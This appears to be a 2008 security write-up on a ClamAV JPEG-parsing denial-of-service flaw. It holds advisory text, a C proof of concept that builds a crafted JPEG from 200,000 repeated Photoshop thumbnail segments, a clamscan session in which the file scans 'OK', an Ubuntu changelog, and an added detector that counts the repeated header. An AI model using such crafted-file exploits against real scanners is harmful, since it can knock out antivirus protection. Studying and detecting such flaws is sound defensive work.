test@ubuntu:~$ clamscan -V
ClamAV 0.94.1/8713/Tue Dec 2 14:59:31 2008

From http://securitytracker.com/alerts/2008/Dec/1021296.html:

Version(s): prior to 0.94.2

Description: A vulnerability was reported in Clam AntiVirus. A remote user can cause denial of service conditions on the target system. A remote user can create a specially crafted JPEG file that, when processed by the target system, will trigger a stack overflow and cause the Clam AntiVirus process to crash. Ilja van Sprundel reported this vulnerability.

Impact: A remote user can create a JPEG file that, when processed by the target application, will cause the target application to crash.

Solution: The vendor has issued a fixed version (0.94.2). The vendor's advisory is available at:
http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134

Also reference @ https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266

test@ubuntu:~$ cat > clam.c
const char crashstr[] =
    "\xff\xd8"              // jpg marker
    "\xff\xed"              // exif data
    "\x00\x02"              // length
    "Photoshop 3.0\x00"
    "8BIM"
    "\x04\x0c"              // thumbnail id
    "\x00"
    "\x01"
    "\x01\x01\x01\x01"
    "0123456789012345678912345678"; // skip over 28 bytes

#include <stdio.h>   /* FILE, fopen, fwrite, fclose, printf */
#include <stdlib.h>  /* exit */

#define NR_ITER 200000

int main()
{
    FILE *fp;
    int i;

    fp = fopen("clamav-jpeg-crash.jpg", "w+");
    if (!fp) {
        printf("can't open/create file\n");
        exit(0);
    }
    /* write the same segment NR_ITER times, back to back */
    for (i = 0; i < NR_ITER; i++) {
        fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1, fp);
    }
    fclose(fp);
    printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
    exit(0);
}

test@ubuntu:~$ gcc -o clam clam.c
test@ubuntu:~$ ./clam
done, now run clamscan on ./clamav-jpeg-crash.jpg
test@ubuntu:~$ which clamscan
/usr/bin/clamscan
test@ubuntu:~$ /usr/bin/clamscan ./clamav-jpeg-crash.jpg
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./clamav-jpeg-crash.jpg: OK

----------- SCAN SUMMARY -----------
Known viruses: 469917
Engine version: 0.94.1
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 11.44 MB
Time: 2.238 sec (0 m 2 s)
test@ubuntu:~$

As of 12.02.2008:

clamav (0.94.dfsg.1-1ubuntu0.1) intrepid-security; urgency=low

  * SECURITY UPDATE: (LP: #296704)
    - Fix off-by-one heap overflow
  * Other changes:
    - debian/control: Recommends apparmor >= 2.1+1075-0ubuntu6 for
      clamav-daemon and clamav-freshclam
    - add debian/usr.bin.freshclam and debian/usr.sbin.clamd
    - debian/clamav-(daemon|freshclam).dirs: add etc/apparmor.d/force-complain
    - debian/clamav-(daemon|freshclam).install: install profiles
    - debian/clamav-(daemon|freshclam).preinst: create symlink for
      force-complain/ on pre-feisty upgrades, upgrades where apparmor-profiles
      profile is unchanged (ie non-enforcing) and upgrades where the profile
      doesn't exist.
    - debian/clamav-(daemon|freshclam).postrm: remove symlink in
      force-complain/ on purge.
    - debian/clamav-(daemon|freshclam).postinst.in: reload apparmor
    - update README.Debian with note on Apparmor
  * Update apparmor profile for clamd to work with TCP sockets (LP: #288942)

 -- Scott Kitterman Wed, 12 Nov 2008 15:20:49 -0500
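
A defensive pre-scan check built only from the byte layout of the PoC on this page (an added example, not part of the original report and not ClamAV code): it counts how often the SOI + 0xFFED + "Photoshop 3.0"/8BIM/0x040c header repeats in a buffer, so a front end can set aside files that repeat it far more often than a real image would. The function names and the `MAX_EMBEDDED_THUMBS` limit are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout from the PoC on this page: FF D8, FF ED, 2-byte length,
 * then "Photoshop 3.0\0", "8BIM" and resource id 0x040c. */
static const unsigned char PS_TAG[] = "Photoshop 3.0\0" "8BIM" "\x04\x0c";
#define PS_TAG_LEN (sizeof(PS_TAG) - 1)
#define HDR_LEN (6 + PS_TAG_LEN)   /* markers + length + tag */
#define MAX_EMBEDDED_THUMBS 16u    /* hypothetical policy limit, not a ClamAV value */

/* Count occurrences of the thumbnail header anywhere in buf. */
size_t count_thumb_headers(const unsigned char *buf, size_t len)
{
    size_t n = 0, i;
    for (i = 0; len >= HDR_LEN && i <= len - HDR_LEN; i++)
        if (memcmp(buf + i, "\xff\xd8\xff\xed", 4) == 0 &&
            memcmp(buf + i + 6, PS_TAG, PS_TAG_LEN) == 0)
            n++;
    return n;
}

/* Non-zero when the buffer repeats the header more often than policy allows. */
int exceeds_thumb_limit(const unsigned char *buf, size_t len)
{
    return count_thumb_headers(buf, len) > MAX_EMBEDDED_THUMBS;
}

/* Constructed sample: `reps` (max 64) copies of the PoC's 60-byte unit,
 * built in memory only and passed to the counter. */
size_t sample_count(size_t reps)
{
    static const unsigned char unit[] =
        "\xff\xd8\xff\xed\x00\x02" "Photoshop 3.0\0" "8BIM" "\x04\x0c"
        "\x00\x01\x01\x01\x01\x01" "0123456789012345678912345678";
    static unsigned char buf[64 * 60];
    size_t i;
    if (reps > 64) reps = 64;
    for (i = 0; i < reps; i++)
        memcpy(buf + i * 60, unit, 60);
    return count_thumb_headers(buf, reps * 60);
}

int main(void)
{
    printf("headers in 20-unit sample: %zu\n", sample_count(20));
    return 0;
}
```

The 60-byte unit matches the session above: 200000 repetitions give 12,000,000 bytes, the 11.44 MB that clamscan reports as scanned.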